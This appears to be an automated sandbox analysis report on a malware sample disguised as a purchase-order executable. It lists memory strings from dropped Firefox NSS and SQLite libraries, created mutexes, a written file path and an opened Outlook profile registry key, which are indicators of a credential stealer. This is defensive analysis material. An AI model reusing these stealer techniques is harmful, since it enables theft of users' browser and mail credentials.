                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeMutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-E1A93A45-640FB406
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:304:WilStaging_02
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile written: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Afskede\Hitherunto\Sale\Swedish.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                    Source: PO No. 3200005919.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr
                    Source: Binary string: ucrtbase.pdb source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
